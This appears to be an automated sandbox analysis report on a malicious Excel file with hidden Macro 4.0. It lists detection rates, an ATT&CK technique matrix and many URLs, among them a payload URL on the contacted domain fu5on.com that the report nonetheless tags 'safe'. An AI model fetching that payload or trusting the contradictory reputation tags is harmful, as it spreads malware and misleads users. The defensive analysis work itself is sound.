    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: regsvr32.exe, 00000002.00000002.236497472.0000000004110000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000002.00000002.236497472.0000000004110000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000002.00000002.236497472.0000000004110000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000002.00000002.236497472.0000000004110000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1322008235.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1322008235.xls37%VirustotalBrowse
    document-1322008235.xls14%MetadefenderBrowse
    document-1322008235.xls6%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    fu5on.com1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%VirustotalBrowse
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fu5on.com
    67.212.179.162
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
      high
      https://login.microsoftonline.com/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
        high
        https://shell.suite.office.com:1443ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
              high
              https://cdn.entity.ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                high
                https://wus2-000.contentsync.ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkeyABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                    high
                    https://powerlift.acompli.netABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                      high
                      https://cortana.aiABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                high
                                https://api.aadrm.com/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                      high
                                      https://cr.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                            high
                                            https://graph.ppe.windows.netABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                            high
                                                            https://graph.windows.netABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                            high
                                                                                            https://fu5on.com/ds/231120.gifdocument-1322008235.xlsfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://insertmedia.bing.office.net/odc/insertmediaABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.netABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policiesABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorizeABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/importsABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/macABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.comABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drfalse
                                                                                                                                            • 0%, Virustotal, Browse
